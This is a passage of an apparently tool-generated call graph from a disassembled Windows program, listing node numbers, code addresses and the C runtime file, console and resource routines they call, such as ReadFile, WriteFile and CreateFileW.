101907->101908 101909 63805b 101908->101909 101910 63807e 101908->101910 101912 628af4 __write 58 API calls 101909->101912 101911 637cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 101910->101911 101922 6380a0 101911->101922 101913 638060 101912->101913 101914 628b28 __gmtime64_s 58 API calls 101913->101914 101916 63806a 101914->101916 101915 63811e GetFileType 101917 63816b 101915->101917 101918 638129 GetLastError 101915->101918 101920 628b28 __gmtime64_s 58 API calls 101916->101920 101927 62d52a __set_osfhnd 59 API calls 101917->101927 101921 628b07 __dosmaperr 58 API calls 101918->101921 101919 6380ec GetLastError 101923 628b07 __dosmaperr 58 API calls 101919->101923 101920->101900 101925 638150 CloseHandle 101921->101925 101922->101915 101922->101919 101926 637cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 101922->101926 101924 638111 101923->101924 101930 628b28 __gmtime64_s 58 API calls 101924->101930 101925->101924 101928 63815e 101925->101928 101929 6380e1 101926->101929 101933 638189 101927->101933 101931 628b28 __gmtime64_s 58 API calls 101928->101931 101929->101915 101929->101919 101930->101957 101932 638163 101931->101932 101932->101924 101934 638344 101933->101934 101935 6318c1 __lseeki64_nolock 60 API calls 101933->101935 101944 63820a 101933->101944 101936 638517 CloseHandle 101934->101936 101934->101957 101937 6381f3 101935->101937 101938 637cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 101936->101938 101940 628af4 __write 58 API calls 101937->101940 101937->101944 101939 63853e 101938->101939 101942 638546 GetLastError 101939->101942 101943 638572 101939->101943 101940->101944 101941 630e5b 70 API calls __read_nolock 101941->101944 101945 628b07 __dosmaperr 58 API calls 101942->101945 101943->101957 101944->101934 101944->101941 101946 63823c 101944->101946 101948 630add __close_nolock 61 API calls 101944->101948 101951 62d886 __write 78 API calls 101944->101951 101952 6383c1 101944->101952 101955 6318c1 60 API calls __lseeki64_nolock 101944->101955 101947 638552 101945->101947 101946->101944 101949 6397a2 __chsize_nolock 82 API calls 101946->101949 101950 62d43d __free_osfhnd 59 API calls 101947->101950 101948->101944 101949->101946 101950->101943 101951->101944 101953 630add __close_nolock 61 API calls 101952->101953 101954 6383c8 101953->101954 101956 628b28 __gmtime64_s 58 API calls 101954->101956 101955->101944 101956->101957 101957->101887 101958->101877 101959->101881 101960->101881 101962 604b83 101961->101962 101963 604c3f LoadLibraryA 101961->101963 101962->101763 101962->101766 101963->101962 101964 604c50 GetProcAddress 101963->101964 101964->101962 101966 620db6 Mailbox 59 API calls 101965->101966 101967 605240 101966->101967 101967->101771 101969 604ec0 101968->101969 101970 604ea3 FindResourceExW 101968->101970 101969->101772 101970->101969 101971 63d933 LoadResource 101970->101971 101971->101969 101972 63d948 SizeofResource 101971->101972 101972->101969 101973 63d95c LockResource 101972->101973 101973->101969 101975 604ef4 101974->101975 101978 63d9ab 101974->101978 101980 62584d 101975->101980 101977 604f02 101977->101783 101979->101772 101981 625859 __wsopen_helper 101980->101981 101982 62586b 101981->101982 101983 625891 101981->101983 101993 628b28 58 API calls __getptd_noexit 101982->101993 101995 626c11 101983->101995 101986 625870 101994 628db6 9 API calls __gmtime64_s 101986->101994 101987 625897 102001 6257be 83 API calls 5 library calls 101987->102001 101990 6258a6 102002 6258c8 LeaveCriticalSection LeaveCriticalSection _fseek 101990->102002 101992 62587b __wsopen_helper 101992->101977 101993->101986 101994->101992 101996 626c43 EnterCriticalSection 101995->101996 101997 626c21 101995->101997 101999 626c39 101996->101999 101997->101996 101998 626c29 101997->101998 102000 629c0b __lock 58 API calls 101998->102000 101999->101987 102000->101999 102001->101990 102002->101992 102006 6255fd 102003->102006 102005 604f2e 102005->101791 102007 625609 __wsopen_helper 102006->102007 102008 62564c 102007->102008 102009 625644 __wsopen_helper 102007->102009 102013 62561f _memset 102007->102013 102010 626c11 __lock_file 59 API calls 102008->102010 102009->102005 102012 625652 102010->102012 102019 62541d 102012->102019 102033 628b28 58 API calls __getptd_noexit 102013->102033 102014 625639 102034 628db6 9 API calls __gmtime64_s 102014->102034 102023 625438 _memset 102019->102023 102026 625453 102019->102026 102020 625443 102131 628b28 58 API calls __getptd_noexit 102020->102131 102022 625493 102022->102026 102027 6255a4 _memset 102022->102027 102036 6246e6 102022->102036 102043 630e5b 102022->102043 102111 630ba7 102022->102111 102133 630cc8 58 API calls 3 library calls 102022->102133 102023->102020 102023->102022 102023->102026 102035 625686 LeaveCriticalSection LeaveCriticalSection _fseek 102026->102035 102134 628b28 58 API calls __getptd_noexit 102027->102134 102032 625448 102132 628db6 9 API calls __gmtime64_s 102032->102132 102033->102014 102034->102009 102035->102009 102037 6246f0 102036->102037 102038 624705 102036->102038 102135 628b28 58 API calls __getptd_noexit 102037->102135 102038->102022 102040 6246f5 102136 628db6 9 API calls __gmtime64_s 102040->102136 102042 624700 102042->102022 102044 630e93 102043->102044 102045 630e7c 102043->102045 102047 6315cb 102044->102047 102052 630ecd 102044->102052 102146 628af4 58 API calls __getptd_noexit 102045->102146 102162 628af4 58 API calls __getptd_noexit 102047->102162 102049 630e81 102147 628b28 58 API calls __getptd_noexit 102049->102147 102050 6315d0 102163 628b28 58 API calls __getptd_noexit 102050->102163 102054 630ed5 102052->102054 102060 630eec 102052->102060 102148 628af4 58 API calls __getptd_noexit 102054->102148 102056 630ee1 102164 628db6 9 API calls __gmtime64_s 102056->102164 102057 630eda 102149 628b28 58 API calls __getptd_noexit 102057->102149 102059 630f01 102150 628af4 58 API calls __getptd_noexit 102059->102150 102060->102059 102063 630f1b 102060->102063 102064 630f39 102060->102064 102091 630e88 102060->102091 102063->102059 102066 630f26 102063->102066 102151 62881d 58 API calls 2 library calls 102064->102151 102137 635c6b 102066->102137 102067 630f49 102069 630f51 102067->102069 102070 630f6c 102067->102070 102152 628b28 58 API calls __getptd_noexit 102069->102152 102154 6318c1 60 API calls 3 library calls 102070->102154 102071 63103a 102073 6310b3 ReadFile 102071->102073 102078 631050 GetConsoleMode 102071->102078 102076 631593 GetLastError 102073->102076 102077 6310d5 102073->102077 102075 630f56 102153 628af4 58 API calls __getptd_noexit 102075->102153 102080 6315a0 102076->102080 102081 631093 102076->102081 102077->102076 102085 6310a5 102077->102085 102082 6310b0 102078->102082 102083 631064 102078->102083 102160 628b28 58 API calls __getptd_noexit 102080->102160 102097 631099 102081->102097 102155 628b07 58 API calls 3 library calls 102081->102155 102082->102073 102083->102082 102086 63106a ReadConsoleW 102083->102086 102093 631377 102085->102093 102094 63110a 102085->102094 102085->102097 102086->102085 102089 63108d GetLastError 102086->102089 102088 6315a5 102161 628af4 58 API calls __getptd_noexit 102088->102161 102089->102081 102091->102022 102092 622d55 _free 58 API calls 102092->102091 102093->102097 102098 63147d ReadFile 102093->102098 102096 631176 ReadFile 102094->102096 102099 6311f7 102094->102099 102100 631197 GetLastError 102096->102100 102107 6311a1 102096->102107 102097->102091 102097->102092 102103 6314a0 GetLastError 102098->102103 102110 6314ae 102098->102110 102099->102097 102101 6312b4 102099->102101 102102 6312a4 102099->102102 102105 631264 MultiByteToWideChar 102099->102105 102100->102107 102101->102105 102158 6318c1 60 API calls 3 library calls 102101->102158 102157 628b28 58 API calls __getptd_noexit 102102->102157 102103->102110 102105->102089 102105->102097 102107->102094 102156 6318c1 60 API calls 3 library calls 102107->102156 102110->102093 102159 6318c1 60 API calls 3 library calls 102110->102159 102112 630bb2 102111->102112 102113 630bc7 102111->102113 102198 628b28 58 API calls __getptd_noexit 102112->102198 102117 630bfc 102113->102117 102125 630bc2 102113->102125 102200 635fe4 58 API calls __malloc_crt 102113->102200 102115 630bb7 102199 628db6 9 API calls __gmtime64_s 102115->102199 102119 6246e6 __fseek_nolock 58 API calls 102117->102119 102120 630c10 102119->102120 102165 630d47 102120->102165 102122 630c17 102123 6246e6 __fseek_nolock 58 API calls 102122->102123 102122->102125 102124 630c3a 102123->102124 102124->102125 102126 6246e6 __fseek_nolock 58 API calls 102124->102126 102125->102022 102127 630c46 102126->102127 102127->102125 102128 6246e6 __fseek_nolock 58 API calls 102127->102128 102129 630c53 102128->102129 102130 6246e6 __fseek_nolock 58 API calls 102129->102130 102130->102125 102131->102032 102132->102026 102133->102022 102134->102032 102135->102040 102136->102042 102138 635c83 102137->102138 102139 635c76 102137->102139 102142 635c8f 102138->102142 102143 628b28 __gmtime64_s 58 API calls 102138->102143 102140 628b28 __gmtime64_s 58 API calls 102139->102140 102141 635c7b 102140->102141 102141->102071 102142->102071 102144 635cb0 102143->102144 102145 628db6 __gmtime64_s 9 API calls 102144->102145 102145->102141 102146->102049 102147->102091 102148->102057 102149->102056 102150->102057 102151->102067 102152->102075 102153->102091 102154->102066 102155->102097 102156->102107 102157->102097 102158->102105 102159->102110 102160->102088 102161->102097 102162->102050 102163->102056 102164->102091 102166 630d53 __wsopen_helper 102165->102166 102167 630d60 102166->102167 102168 630d77 102166->102168 102169 628af4 __write 58 API calls 102167->102169 102170 630e3b 102168->102170 102173 630d8b 102168->102173 102172 630d65 102169->102172 102171 628af4 __write 58 API calls 102170->102171 102174 630dae 102171->102174 102175 628b28 __gmtime64_s 58 API calls 102172->102175 102176 630db6 102173->102176 102177 630da9 102173->102177 102183 628b28 __gmtime64_s 58 API calls 102174->102183 102190 630d6c __wsopen_helper 102175->102190 102178 630dc3 102176->102178 102179 630dd8 102176->102179 102180 628af4 __write 58 API calls 102177->102180 102181 628af4 __write 58 API calls 102178->102181 102182 62d206 ___lock_fhandle 59 API calls 102179->102182 102180->102174 102184 630dc8 102181->102184 102185 630dde 102182->102185 102186 630dd0 102183->102186 102187 628b28 __gmtime64_s 58 API calls 102184->102187 102188 630df1 102185->102188 102189 630e04 102185->102189 102192 628db6 __gmtime64_s 9 API calls 102186->102192 102187->102186 102191 630e5b __read_nolock 70 API calls 102188->102191 102193 628b28 __gmtime64_s 58 API calls 102189->102193 102190->102122 102194 630dfd 102191->102194 102192->102190 102195 630e09 102193->102195 102197 630e33 __read LeaveCriticalSection 102194->102197 102196 628af4 __write 58 API calls 102195->102196 102196->102194 102197->102190 102198->102115 102199->102125 102200->102117 102204 62520a GetSystemTimeAsFileTime 102201->102204 102203 668f6e 102203->101793 102205 625238 __aulldiv 102204->102205 102205->102203 102207 625c6c __wsopen_helper 102206->102207 102208 625c93 102207->102208 102209 625c7e 102207->102209 102210 626c11 __lock_file 59 API calls 102208->102210 102220 628b28 58 API calls __getptd_noexit 102209->102220 102212 625c99 102210->102212 102222 6258d0 67 API calls 6 library calls 102212->102222 102213 625c83 102221 628db6 9 API calls __gmtime64_s 102213->102221 102216 625ca4 102223 625cc4 LeaveCriticalSection LeaveCriticalSection _fseek 102216->102223 102218 625cb6 102219 625c8e __wsopen_helper 102218->102219 102219->101798 102220->102213 102221->102219 102222->102216 102223->102218 102224->101663 102225->101676 102226->101678 102227->101675 102228->101684 102230 609169 Mailbox 102229->102230 102231 63f19f 102230->102231 102236 609173 102230->102236 102232 620db6 Mailbox 59 API calls 102231->102232 102235 63f1ab 102232->102235 102233 60917a 102233->101689 102235->102235 102236->102233 102237 609c90 102236->102237 102239 609c9b 102237->102239 102238 609cd2 102238->102236 102239->102238 102242 608cd4 59 API calls Mailbox 102239->102242 102241 609cfd 102241->102236 102242->102241 102244 609d4a 102243->102244 102254 609d78 Mailbox 102243->102254 102245 609d9d 102244->102245 102248 609d50 Mailbox 102244->102248 102246 608047 59 API calls 102245->102246 102246->102254 102247 609d64 102249 609dcc 102247->102249 102250 609d6f 102247->102250 102247->102254 102248->102247 102251 63fa0f 102248->102251 102249->102254 102257 608cd4 59 API calls Mailbox 102249->102257 102253 63f9e6 VariantClear 102250->102253 102250->102254 102251->102254 102258 656e8f 59 API calls 102251->102258 102253->102254 102254->101699 102256->101694 102257->102254 102258->102254 102262 669748 __tzset_nolock _wcscmp 102259->102262 102260 669109 GetSystemTimeAsFileTime 102260->102262 102261 6695dc 102261->101705 102261->101731 102262->102260 102262->102261 102263 604f0b 74 API calls 102262->102263 102264 604ee5 85 API calls 102262->102264 102263->102262 102264->102262 102266 668b1f 102265->102266 102267 668b11 102265->102267 102269 668b64 102266->102269 102270 62525b 115 API calls 102266->102270 102292 668b28 102266->102292 102268 62525b 115 API calls 102267->102268 102268->102266 102296 668d91 102269->102296 102272 668b49 102270->102272 102272->102269 102274 668b52 102272->102274 102273 668ba8 102275 668bac 102273->102275 102276 668bcd 102273->102276 102277 6253a6 __fcloseall 83 API calls 102274->102277 102274->102292 102279 668bb9 102275->102279 102281 6253a6 __fcloseall 83 API calls 102275->102281 102300 6689a9 102276->102300 102277->102292 102284 6253a6 __fcloseall 83 API calls 102279->102284 102279->102292 102281->102279 102282 668bfb 102309 668c2b 102282->102309 102283 668bdb 102285 668be8 102283->102285 102287 6253a6 __fcloseall 83 API calls 102283->102287 102284->102292 102290 6253a6 __fcloseall 83 API calls 102285->102290 102285->102292 102287->102285 102290->102292 102292->101734 102293 668c16 102293->102292 102295 6253a6 __fcloseall 83 API calls 102293->102295 102295->102292 102297 668db6 102296->102297 102299 668d9f __tzset_nolock _memmove 102296->102299 102298 6255e2 __fread_nolock 74 API calls 102297->102298 102298->102299 102299->102273 102301 62571c __crtGetStringTypeA_stat 58 API calls 102300->102301 102302 6689b8 102301->102302 102303 62571c __crtGetStringTypeA_stat 58 API calls 102302->102303 102304 6689cc 102303->102304 102305 62571c __crtGetStringTypeA_stat 58 API calls 102304->102305 102306 6689e0 102305->102306 102307 668d0d 58 API calls 102306->102307 102308 6689f3 102306->102308 102307->102308 102308->102282 102308->102283 102313 668c40 102309->102313 102310 668cf8 102342 668f35 102310->102342 102312 668a05 74 API calls 102312->102313 102313->102310 102313->102312 102316 668c02 102313->102316 102338 668e12 102313->102338 102346 668aa1 74 API calls 102313->102346 102317 668d0d 102316->102317 102318 668d1a 102317->102318 102321 668d20 102317->102321 102319 622d55 _free 58 API calls 102318->102319 102319->102321 102320 668d31 102322 668c09 102320->102322 102324 622d55 _free 58 API calls 102320->102324 102321->102320 102323 622d55 _free 58 API calls 102321->102323 102322->102293 102325 6253a6 102322->102325 102323->102320 102324->102322 102326 6253b2 __wsopen_helper 102325->102326 102327 6253c6 102326->102327 102328 6253de 102326->102328 102395 628b28 58 API calls __getptd_noexit 102327->102395 102330 626c11 __lock_file 59 API calls 102328->102330 102334 6253d6 __wsopen_helper 102328->102334 102332 6253f0 102330->102332 102331 6253cb 102396 628db6 9 API calls __gmtime64_s 102331->102396 102379 62533a 102332->102379 102334->102293 102339 668e21 102338->102339 102340 668e61 102338->102340 102339->102313 102340->102339 102347 668ee8 102340->102347 102343 668f42 102342->102343 102345 668f53 102342->102345 102344 624863 80 API calls 102343->102344 102344->102345 102345->102316 102346->102313 102348 668f14 102347->102348 102349 668f25 102347->102349 102351 624863 102348->102351 102349->102340 102352 62486f __wsopen_helper 102351->102352 102353 6248a5 102352->102353 102354 62488d 102352->102354 102355 62489d __wsopen_helper 102352->102355 102356 626c11 __lock_file 59 API calls 102353->102356 102376 628b28 58 API calls __getptd_noexit 102354->102376 102355->102349 102358 6248ab 102356->102358 102364 62470a 102358->102364 102359 624892 102377 628db6 9 API calls __gmtime64_s 102359->102377 102365 624737 102364->102365 102367 624719 102364->102367 102378 6248dd LeaveCriticalSection LeaveCriticalSection _fseek 102365->102378 102366 624727 102368 628b28 __gmtime64_s 58 API calls 102366->102368 102367->102365 102367->102366 102375 624751 _memmove 102367->102375 102369 62472c 102368->102369 102370 628db6 __gmtime64_s 9 API calls 102369->102370 102370->102365 102371 62ae1e __flsbuf 78 API calls 102371->102375 102372 624a3d __flush 78 API calls 102372->102375 102373 6246e6 __fseek_nolock 58 API calls 102373->102375 102374 62d886 __write 78 API calls 102374->102375 102375->102365 102375->102371 102375->102372 102375->102373 102375->102374 102376->102359 102377->102355 102378->102355 102380 625349 102379->102380 102381 62535d 102379->102381 102434 628b28 58 API calls __getptd_noexit 102380->102434 102385 625359 102381->102385 102398 624a3d 102381->102398 102384 62534e 102435 628db6 9 API calls __gmtime64_s 102384->102435 102397 625415 LeaveCriticalSection LeaveCriticalSection _fseek 102385->102397 102390 6246e6 __fseek_nolock 58 API calls 102391 625377 102390->102391 102408 630a02 102391->102408 102393 62537d 102393->102385 102394 622d55 _free 58 API calls 102393->102394 102394->102385 102395->102331 102396->102334 102397->102334 102399 624a74 102398->102399 102400 624a50 102398->102400 102404 630b77 102399->102404 102400->102399 102401 6246e6 __fseek_nolock 58 API calls 102400->102401 102402 624a6d 102401->102402 102436 62d886 102402->102436 102405 625371 102404->102405 102406 630b84 102404->102406 102405->102390 102406->102405 102407 622d55 _free 58 API calls 102406->102407 102407->102405 102409 630a0e __wsopen_helper 102408->102409 102410 630a32 102409->102410 102411 630a1b 102409->102411 102412 630abd 102410->102412 102414 630a42 102410->102414 102561 628af4 58 API calls __getptd_noexit 102411->102561 102566 628af4 58 API calls __getptd_noexit 102412->102566 102417 630a60 102414->102417 102418 630a6a 102414->102418 102416 630a20 102562 628b28 58 API calls __getptd_noexit 102416->102562 102563 628af4 58 API calls __getptd_noexit 102417->102563 102422 62d206 ___lock_fhandle 59 API calls 102418->102422 102419 630a65 102567 628b28 58 API calls __getptd_noexit 102419->102567 102424 630a70 102422->102424 102426 630a83 102424->102426 102427 630a8e 102424->102427 102425 630ac9 102568 628db6 9 API calls __gmtime64_s 102425->102568 102546 630add 102426->102546 102564 628b28 58 API calls __getptd_noexit 102427->102564 102430 630a27 __wsopen_helper 102430->102393 102432 630a89 102565 630ab5 LeaveCriticalSection __unlock_fhandle 102432->102565 102434->102384 102435->102385 102437 62d892 __wsopen_helper 102436->102437 102438 62d89f 102437->102438 102441 62d8b6 102437->102441 102537 628af4 58 API calls __getptd_noexit 102438->102537 102440 62d955 102543 628af4 58 API calls __getptd_noexit 102440->102543 102441->102440 102444 62d8ca 102441->102444 102443 62d8a4 102538 628b28 58 API calls __getptd_noexit 102443->102538 102447 62d8f2 102444->102447 102448 62d8e8 102444->102448 102445 62d8ed 102544 628b28 58 API calls __getptd_noexit 102445->102544 102464 62d206 102447->102464 102539 628af4 58 API calls __getptd_noexit 102448->102539 102452 62d8f8 102454 62d90b 102452->102454 102455 62d91e 102452->102455 102453 62d961 102545 628db6 9 API calls __gmtime64_s 102453->102545 102473 62d975 102454->102473 102540 628b28 58 API calls __getptd_noexit 102455->102540 102459 62d8ab __wsopen_helper 102459->102399 102460 62d917 102542 62d94d LeaveCriticalSection __unlock_fhandle 102460->102542 102461 62d923 102541 628af4 58 API calls __getptd_noexit 102461->102541 102465 62d212 __wsopen_helper 102464->102465 102466 62d261 EnterCriticalSection 102465->102466 102468 629c0b __lock 58 API calls 102465->102468 102467 62d287 __wsopen_helper 102466->102467 102467->102452 102469 62d237 102468->102469 102470 62d24f 102469->102470 102471 629e2b __mtinitlocks InitializeCriticalSectionAndSpinCount 102469->102471 102472 62d28b ___lock_fhandle LeaveCriticalSection 102470->102472 102471->102470 102472->102466 102474 62d982 __ftell_nolock 102473->102474 102475 62d9e0 102474->102475 102476 62d9c1 102474->102476 102506 62d9b6 102474->102506 102479 62da38 102475->102479 102480 62da1c 102475->102480 102478 628af4 __write 58 API calls 102476->102478 102477 62c5f6 ___crt_atoflt_l 6 API calls 102481 62e1d6 102477->102481 102482 62d9c6 102478->102482 102484 62da51 102479->102484 102487 6318c1 __lseeki64_nolock 60 API calls 102479->102487 102483 628af4 __write 58 API calls 102480->102483 102481->102460 102485 628b28 __gmtime64_s 58 API calls 102482->102485 102486 62da21 102483->102486 102489 635c6b __flsbuf 58 API calls 102484->102489 102488 62d9cd 102485->102488 102490 628b28 __gmtime64_s 58 API calls 102486->102490 102487->102484 102491 628db6 __gmtime64_s 9 API calls 102488->102491 102492 62da5f 102489->102492 102494 62da28 102490->102494 102491->102506 102493 62ddb8 102492->102493 102498 6299ac __setmbcp 58 API calls 102492->102498 102495 62ddd6 102493->102495 102496 62e14b WriteFile 102493->102496 102497 628db6 __gmtime64_s 9 API calls 102494->102497 102499 62defa 102495->102499 102508 62ddec 102495->102508 102500 62ddab GetLastError 102496->102500 102505 62dd78 102496->102505 102497->102506 102501 62da8b GetConsoleMode 102498->102501 102503 62df05 102499->102503 102521 62dfef 102499->102521 102500->102505 102501->102493 102504 62daca 102501->102504 102502 62e184 102502->102506 102510 628b28 __gmtime64_s 58 API calls 102502->102510 102503->102502 102517 62df6a WriteFile 102503->102517 102504->102493 102507 62dada GetConsoleCP 102504->102507 102505->102502 102505->102506 102511 62ded8 102505->102511 102506->102477 102507->102502 102534 62db09 102507->102534 102508->102502 102509 62de5b WriteFile 102508->102509 102509->102500 102512 62de98 102509->102512 102513 62e1b2 102510->102513 102514 62dee3 102511->102514 102515 62e17b 102511->102515 102512->102508 102525 62debc 102512->102525 102518 628af4 __write 58 API calls 102513->102518 102519 628b28 __gmtime64_s 58 API calls 102514->102519 102520 628b07 __dosmaperr 58 API calls 102515->102520 102516 62e064 WideCharToMultiByte 102516->102500 102529 62e0ab 102516->102529 102517->102500 102522 62dfb9 102517->102522 102518->102506 102523 62dee8 102519->102523 102520->102506 102521->102502 102521->102516 102522->102503 102522->102505 102522->102525 102526 628af4 __write 58 API calls 102523->102526 102524 62e0b3 WriteFile 102528 62e106 GetLastError 102524->102528 102524->102529 102525->102505 102526->102506 102527 6235f5 __write_nolock 58 API calls 102527->102534 102528->102529 102529->102505 102529->102521 102529->102524 102529->102525 102530 6362ba 60 API calls __write_nolock 102530->102534 102531 637a5e WriteConsoleW CreateFileW __putwch_nolock 102535 62dc5f 102531->102535 102532 62dbf2 WideCharToMultiByte 102532->102505 102533 62dc2d WriteFile 102532->102533 102533->102500 102533->102535 102534->102505 102534->102527 102534->102530 102534->102532 102534->102535 102535->102500 102535->102505 102535->102531 102535->102534 102536 62dc87 WriteFile 102535->102536 102536->102500 102536->102535 102537->102443 102538->102459 102539->102445 102540->102461 102541->102460 102542->102459 102543->102445 102544->102453 102545->102459 102569 62d4c3 102546->102569 102548 630b41 102582 62d43d 59 API calls 2 library calls 102548->102582 102550 630aeb 102550->102548 102551 62d4c3 __lseeki64_nolock 58 API calls 102550->102551 102560 630b1f 102550->102560 102554 630b16 102551->102554 102552 62d4c3 __lseeki64_nolock 58 API calls 102555 630b2b CloseHandle 102552->102555 102553 630b49 102556 630b6b 102553->102556 102583 628b07 58 API calls 3 library calls 102553->102583 102557 62d4c3 __lseeki64_nolock 58 API calls 102554->102557 102555->102548 102558 630b37 GetLastError 102555->102558 102556->102432 102557->102560 102558->102548 102560->102548 102560->102552 102561->102416 102562->102430 102563->102419 102564->102432 102565->102430 102566->102419 102567->102425 102568->102430 102570 62d4e3 102569->102570 102571 62d4ce 102569->102571 102574 628af4 __write 58 API calls 102570->102574 102576 62d508 102570->102576 102572 628af4 __write 58 API calls 102571->102572 102573 62d4d3 102572->102573 102575 628b28 __gmtime64_s 58 API calls 102573->102575 102577 62d512 102574->102577 102578 62d4db 102575->102578 102576->102550 102579 628b28 __gmtime64_s 58 API calls 102577->102579 102578->102550 102580 62d51a 102579->102580 102581 628db6 __gmtime64_s 9 API calls 102580->102581 102581->102578 102582->102553 102583->102556 102646 631940 102584->102646 102587 604799 102652 607d8c 102587->102652 102588 60477c 102589 607bcc 59 API calls 102588->102589 102591 604788 102589->102591 102648 607726 102591->102648 102594 620791 102595 631940 __ftell_nolock 102594->102595 102596 62079e GetLongPathNameW 102595->102596 102597 607bcc 59 API calls 102596->102597 102598 6072bd 102597->102598 102599 60700b 102598->102599 102600 607667 59 API calls 102599->102600 102601 60701d 102600->102601 102602 604750 60 API calls 102601->102602 102603 607028 102602->102603 102604 607033 102603->102604 102605 63e885 102603->102605 102607 603f74 59 API calls 102604->102607 102611 63e89f 102605->102611 102662 607908 61 API calls 102605->102662 102608 60703f 102607->102608 102656 6034c2 102608->102656 102610 607052 Mailbox 102610->101501 102613 604ddd 136 API calls 102612->102613 102614 60688f 102613->102614 102615 63e031 102614->102615 102616 604ddd 136 API calls 102614->102616 102617 66955b 122 API calls 102615->102617 102618 6068a3 102616->102618 102619 63e046 102617->102619 102618->102615 102620 6068ab 102618->102620 102621 63e067 102619->102621 102622 63e04a 102619->102622 102624 63e052 102620->102624 102625 6068b7 102620->102625 102623 620db6 Mailbox 59 API calls 102621->102623 102626 604e4a 84 API calls 102622->102626 102645 63e0ac Mailbox 102623->102645 102770 6642f8 90 API calls _wprintf 102624->102770 102663 606a8c 102625->102663 102626->102624 102629 63e060 102629->102621 102631 63e260 102632 622d55 _free 58 API calls 102631->102632 102633 63e268 102632->102633 102634 604e4a 84 API calls 102633->102634 102639 63e271 102634->102639 102638 622d55 _free 58 API calls 102638->102639 102639->102638 102641 604e4a 84 API calls 102639->102641 102774 65f7a1 89 API calls 4 library calls 102639->102774 102641->102639 102642 607de1 59 API calls 102642->102645 102645->102631 102645->102639 102645->102642 102756 60750f 102645->102756 102764 60735d 102645->102764 102771 65f73d 59 API calls 2 library calls 102645->102771 102772 65f65e 61 API calls 2 library calls 102645->102772 102773 66737f 59 API calls Mailbox 102645->102773 102647 60475d GetFullPathNameW 102646->102647 102647->102587 102647->102588 102649 607734 102648->102649 102650 607d2c 59 API calls 102649->102650 102651 604794 102650->102651 102651->102594 102653 607da6 102652->102653 102655 607d99 102652->102655 102654 620db6 Mailbox 59 API calls 102653->102654 102654->102655 102655->102591 102657 6034d4 102656->102657 102661 6034f3 _memmove 102656->102661 102659 620db6 Mailbox 59 API calls 102657->102659 102658 620db6 Mailbox 59 API calls 102660 60350a 102658->102660 102659->102661 102660->102610 102661->102658 102662->102605 102664 606ab5 102663->102664 102665 63e41e 102663->102665 102780 6057a6 60 API calls Mailbox 102664->102780 102847 65f7a1 89 API calls 4 library calls 102665->102847 102668 63e431 102848 65f7a1 89 API calls 4 library calls 102668->102848 102669 606ad7 102781 6057f6 67 API calls 102669->102781 102671 606aec 102671->102668 102672 606af4 102671->102672 102674 607667 59 API calls 102672->102674 102676 606b00 102674->102676 102675 63e44d 102678 606b61 102675->102678 102782 620957 60 API calls __ftell_nolock 102676->102782 102680 63e460 102678->102680 102681 606b6f 102678->102681 102679 606b0c 102682 607667 59 API calls 102679->102682 102683 605c6f CloseHandle 102680->102683 102684 607667 59 API calls 102681->102684 102685 606b18 102682->102685 102686 63e46c 102683->102686 102687 606b78 102684->102687 102689 604750 60 API calls 102685->102689 102690 604ddd 136 API calls 102686->102690 102688 607667 59 API calls 102687->102688 102691 606b81 102688->102691 102692 606b26 102689->102692 102693 63e488 102690->102693 102785 60459b 102691->102785 102783 605850 ReadFile SetFilePointerEx 102692->102783 102696 63e4b1 102693->102696 102697 66955b 122 API calls 102693->102697 102849 65f7a1 89 API calls 4 library calls 102696->102849 102701 63e4a4 102697->102701 102698 606b98 102702 607b2e 59 API calls 102698->102702 102700 606b52 102784 605aee SetFilePointerEx SetFilePointerEx 102700->102784 102705 63e4cd 102701->102705 102706 63e4ac 102701->102706 102707 606ba9 SetCurrentDirectoryW 102702->102707 102703 63e4c8 102734 606d0c Mailbox 102703->102734 102709 604e4a 84 API calls 102705->102709 102708 604e4a 84 API calls 102706->102708 102712 606bbc Mailbox 102707->102712 102708->102696 102710 63e4d2 102709->102710 102711 620db6 Mailbox 59 API calls 102710->102711 102718 63e506 102711->102718 102714 620db6 Mailbox 59 API calls 102712->102714 102716 606bcf 102714->102716 102715 603bbb 102715->101355 102715->101364 102717 60522e 59 API calls 102716->102717 102744 606bda Mailbox __NMSG_WRITE 102717->102744 102719 60750f 59 API calls 102718->102719 102738 63e54f Mailbox 102719->102738 102720 606ce7 102843 605c6f 102720->102843 102722 63e740 102854 6672df 59 API calls Mailbox 102722->102854 102724 606cf3 SetCurrentDirectoryW 102724->102734 102727 63e762 102855 67fbce 59 API calls 2 library calls 102727->102855 102730 63e76f 102732 622d55 _free 58 API calls 102730->102732 102731 63e7d9 102858 65f7a1 89 API calls 4 library calls 102731->102858 102732->102734 102775 6057d4 102734->102775 102736 60750f 59 API calls 102736->102738 102737 63e7f2 102737->102720 102738->102722 102738->102736 102747 607de1 59 API calls 102738->102747 102751 63e792 102738->102751 102850 65f73d 59 API calls 2 library calls 102738->102850 102851 65f65e 61 API calls 2 library calls 102738->102851 102852 66737f 59 API calls Mailbox 102738->102852 102853 607213 59 API calls Mailbox 102738->102853 102739 63e7d1 102857 65f5f7 59 API calls 4 library calls 102739->102857 102741 607de1 59 API calls 102741->102744 102744->102720 102744->102731 102744->102739 102744->102741 102836 60586d 67 API calls _wcscpy 102744->102836 102837 606f5d GetStringTypeW 102744->102837 102838 606ecc 60 API calls __wcsnicmp 102744->102838 102839 606faa GetStringTypeW __NMSG_WRITE 102744->102839 102840 62363d GetStringTypeW _iswctype 102744->102840 102841 6068dc 165 API calls 3 library calls 102744->102841 102842 607213 59 API calls Mailbox 102744->102842 102747->102738 102856 65f7a1 89 API calls 4 library calls 102751->102856 102753 63e7ab 102754 622d55 _free 58 API calls 102753->102754 102755 63e7be 102754->102755 102755->102734 102757 6075af 102756->102757 102761 607522 _memmove 102756->102761 102759 620db6 Mailbox 59 API calls 102757->102759 102758 620db6 Mailbox 59 API calls 102760 607529 102758->102760 102759->102761 102762 620db6 Mailbox 59 API calls 102760->102762 102763 607552 102760->102763 102761->102758 102762->102763 102763->102645 102766 607370 102764->102766 102769 60741e 102764->102769 102765 6073a2 102767 620db6 59 API calls Mailbox 102765->102767 102765->102769 102766->102765 102768 620db6 Mailbox 59 API calls 102766->102768 102767->102765 102768->102765 102769->102645 102770->102629 102771->102645 102772->102645 102773->102645 102774->102639 102776 605c6f CloseHandle 102775->102776 102777 6057dc Mailbox 102776->102777 102778 605c6f CloseHandle 102777->102778 102779 6057eb 102778->102779 102779->102715 102780->102669 102781->102671 102782->102679 102783->102700 102784->102678 102786 607667 59 API calls 102785->102786 102787 6045b1 102786->102787 